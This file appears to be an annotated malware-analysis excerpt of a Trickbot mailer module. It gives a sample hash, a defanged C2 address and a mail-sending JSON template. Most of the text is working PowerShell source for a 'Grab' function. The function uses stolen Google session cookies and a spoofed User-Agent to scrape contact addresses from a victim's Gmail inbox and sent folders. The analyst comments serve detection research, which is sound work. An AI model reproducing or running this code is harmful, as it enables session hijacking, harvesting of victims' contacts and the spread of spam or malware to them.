2019-07-08-trickbot-mailer.vk.txt
SHA-256: d96fd330c765b88f3503899755624cbe020ab3e2c53e28d7dee38e7b35f3eab2
C2: 185.86.148[.]63:2050
Example
Content-Disposition: form-data; name="batchJson"
Content-Type: application/json`r`n
{"requests":[{"id":"SaveMessage","uri":"/ws/v3/mailboxes/@.id==$folderId/messages","method":"POST","payloadType":"multipart","payloadParts":[{"partName":"jsonString","contentType":"application/json","payload":{"actions":{"responseMessage":true},"message":{"csid":"$csid","newMessage":true,"headers":{"subject":"$subject","from":[{"name":"$fromName","email":"$mymail"}],"replyTo":[],"to":[$toSingle],"cc":[],"bcc":[$bccArray]},"folder":{"id":"3"},"flags":{"spam":"false","read":"true"}},"simpleBody":{"attachments":[$attachments],"html":"$body"}}}],"filters":{"select":{"messageId":"$..message.immutableid","csid":"$..message.csid","cid":"$..message.conversationId"}},"requests":[{"id":"GetSimpleBody","uri":"/ws/v3/mailboxes/@.id==$folderId/messages/@.id==`$(messageId)/content/simplebody/full/secure","method":"GET","payloadType":"embedded"},{"id":"SendMessage","uri":"/ws/v3/mailboxes/@.id==$folderId/messages/@.id==`$(messageId)/send","method":"POST","payloadType":"embedded","payload":{"csid":"`$(csid)","destinationFolder":{"id":"2"}},"requests":[{"id":"GetMessageGroupList","uri":"/ws/v3/mailboxes/@.id==$folderId/messages/@.select==q?q=%20groupBy%3AconversationId%20count%3A1%20offset%3A0%20conversationId%3A(`$(cid))","method":"GET","payloadType":"embedded"}]}]}],"responseType":"json"}
Grab -> Send -> GetMIMEType
# Grab: harvests e-mail addresses from a Gmail account using session cookies
# supplied by the caller, and emits a de-duplicated list that excludes the
# account's own address. In this sample only the inbox and sent-folder paths
# are implemented; the address-book and folders switches are empty stubs.
#
# Parameters:
#   $collectFromInbox       - if $true, scan the inbox listing (search=inbox)
#   $collectFromOutbox      - if $true, scan the sent listing (search=sent)
#   $collectFromAddressBook - accepted but a no-op in this version
#   $collectFromFolders     - accepted but a no-op in this version
#   $cookies                - indexable by cookie name; each entry is itself
#                             indexed with [0] to reach the value (see the
#                             Cookie header below). Shape inferred from usage
#                             only -- the cookie source is outside this excerpt.
# Output: string[] of harvested addresses via Write-Output; when one of the
#         five required cookies is missing the function returns the result of
#         Write-Error instead (effectively nothing).
#
# Analyst note: every request goes to https://mail.google.com/mail/ with a
# hand-built Cookie header and a User-Agent randomized per run, so the stable
# observable for detection is a PowerShell/WebClient process reaching Gmail
# with a browser-like UA, not the UA string itself. The sibling Send and
# GetMIMEType functions named in the notes above are not in this excerpt.
Function Grab {
[cmdletbinding()]
param(
[bool]$collectFromInbox,
[bool]$collectFromOutbox,
[bool]$collectFromAddressBook,
[bool]$collectFromFolders,
[System.Object]$cookies
)
process {
# System.Web is loaded but nothing in Grab references it; presumably needed
# by a sibling function -- outside this view.
Add-Type -AssemblyName System.Web;
# All five Google session cookies are mandatory; the absence of any one aborts
# the run with Write-Error before any network request is made.
# SID
if (-not $cookies["SID"]) { return Write-Error "Cookie SID not found"; }
# HSID
if (-not $cookies["HSID"]) { return Write-Error "Cookie HSID not found"; }
# SSID
if (-not $cookies["SSID"]) { return Write-Error "Cookie SSID not found"; }
# NID
if (-not $cookies["NID"]) { return Write-Error "Cookie NID not found"; }
# OSID
if (-not $cookies["OSID"]) { return Write-Error "Cookie OSID not found"; }
# Accumulator for every address found in the listings (duplicates allowed
# until the pass at the end).
$emails = @();
# WebClient configured with the stolen session: the Cookie header is built by
# string concatenation from the first element of each cookie entry.
$wc = New-Object system.Net.WebClient;
$wc.Headers.Add([System.Net.HttpRequestHeader]::Cookie, (
"SID=" + $cookies["SID"][0] +
"; HSID=" + $cookies["HSID"][0] +
"; SSID=" + $cookies["SSID"][0] +
"; OSID=" + $cookies["OSID"][0] +
"; NID=" + $cookies["NID"][0]));
$wc.Encoding = [System.Text.Encoding]::UTF8;
# User-Agent spoofing: picks Firefox (index 0) or Chrome (index 1), one of the
# NT version strings, and random browser/WebKit version numbers. Because the
# three random draws are made before the branch, $userAgent is first an int
# array and then replaced by the formatted string.
$ntVersion = @("3.1", "3.5", "3.51", "4.0", "5.0", "5.1", "5.2", "6.0", "6.1", "6.2", "6.3", "10.0");
$userAgentFirefox = @("Mozilla/5.0 (Windows NT {0}; rv:{1}.0) Gecko/20100101 Firefox/{1}.0", "Mozilla/5.0 (Windows NT {0}; Win64; x64; rv:{1}.0) Gecko/20100101 Firefox/{1}.0", "Mozilla/5.0 (Windows NT {0}; WOW64; rv:{1}.0) Gecko/20100101 Firefox/{1}.0");
$userAgentChrome = @("Mozilla/5.0 (Windows NT {0}; WOW64) AppleWebKit/{2}.{3} (KHTML, like Gecko) Chrome/{1}.0.3202.94 Safari/{2}.{3}");
$userAgent = @((Get-Random -minimum 0 -maximum 2), (Get-Random -minimum 0 -maximum 3), (Get-Random -minimum 0 -maximum 12));
if ($userAgent[0] -eq 0)
{
$userAgent = [system.string]::format($userAgentFirefox[$userAgent[1]], $ntVersion[$userAgent[2]], (Get-Random -minimum 50 -maximum 66))
} else {
$userAgent = [system.string]::format($userAgentChrome[0], $ntVersion[$userAgent[2]], (Get-Random -minimum 50 -maximum 62), (Get-Random -minimum 500 -maximum 700), (Get-Random -minimum 0 -maximum 100))
}
$wc.Headers.Add("User-Agent", $userAgent);
# First request: GET the Gmail front page with the session cookies and scrape
# the inline "var GLOBALS=[...]" array. The two regexes capture its tenth
# entry (the per-session "ik" token reused in every later URL) and its
# eleventh entry (the account's own address, kept in $mymail so it can be
# excluded from the result). Note $matches shadows PowerShell's automatic
# $Matches variable; harmless here because -match is never used in Grab.
$ik = $wc.downloadString("https://mail.google.com/mail/");
$matches = (New-Object System.Text.RegularExpressions.Regex('var GLOBALS=\[.+?\,.+?\,.+?\,.+?\,.+?\,.+?\,.+?\,.+?\,.+?\,\"(.+?)\",', [System.Text.RegularExpressions.RegexOptions]::IgnoreCase)).matches($ik);
$mymail = (New-Object System.Text.RegularExpressions.Regex('var GLOBALS=\[.+?\,.+?\,.+?\,.+?\,.+?\,.+?\,.+?\,.+?\,.+?\,.+?,\"(.+?)\",', [System.Text.RegularExpressions.RegexOptions]::IgnoreCase)).matches($ik);
# No check that either regex matched: a layout change in the page would make
# the [0] indexing below fail rather than produce an error message.
$mymail = $mymail[0].Groups[1].Value;
$ik = $matches[0].Groups[1].Value;
# debug headers
#For ($i=0; $i -lt $wc.Headers.Count; $i++) {Write-Output($wc.Headers.Keys[$i] + ":" + $wc.Headers[$i])}#: $wc.Headers.Get($i); }
if($collectFromInbox) {
# Inbox listing: a single POST asking for the whole thread list at once
# (num=100000000). The response is scraped for JSON-escaped email="..."
# sequences (\u003d is "=") and every capture is appended to $emails.
$res = $wc.UploadString("https://mail.google.com/mail/?ik=" + $ik + "&view=tl&start=0&num=100000000&rt=c&search=inbox", 'POST');
# parse mails
$matches = (New-Object System.Text.RegularExpressions.Regex('email\\u003d\\\"(.+?)\\\"', [System.Text.RegularExpressions.RegexOptions]::IgnoreCase)).matches($res);
For ($i=0; $i -lt $matches.Count; $i++) { $emails += $matches[$i].Groups[1].Value; }
}
# Sent listing: identical to the inbox path except for search=sent.
if($collectFromOutbox) {
# get sent mails
$res = $wc.UploadString("https://mail.google.com/mail/?ik=" + $ik + "&view=tl&start=0&num=100000000&rt=c&search=sent", 'POST');
# parse mails
$matches = (New-Object System.Text.RegularExpressions.Regex('email\\u003d\\\"(.+?)\\\"', [System.Text.RegularExpressions.RegexOptions]::IgnoreCase)).matches($res);
For ($i=0; $i -lt $matches.Count; $i++) { $emails += $matches[$i].Groups[1].Value; }
}
# Address-book collection: switch accepted, body empty in this build.
if($collectFromAddressBook) {
# end
}
# Per-folder collection: switch accepted, body empty in this build.
if($collectFromFolders) {
# end
}
# Remove duplicates with a nested linear scan (O(n^2)); the account's own
# address ($mymail) is dropped here as well. Comparison is PowerShell's
# default case-insensitive -eq.
$tmpEms = $emails;
$emails = @();
For ($i=0; $i -lt $tmpEms.Count; $i++) {
$isSet = $false;
For ($l=0; $l -lt $emails.Count; $l++) {
if ($tmpEms[$i] -eq $emails[$l]){ $isSet = $true; }
}
if ($isSet -eq $false -and $tmpEms[$i] -ne $mymail){ $emails += $tmpEms[$i]; }
}
# Emit the harvested list to the pipeline (consumed by Send per the notes).
write-output $emails;
}
}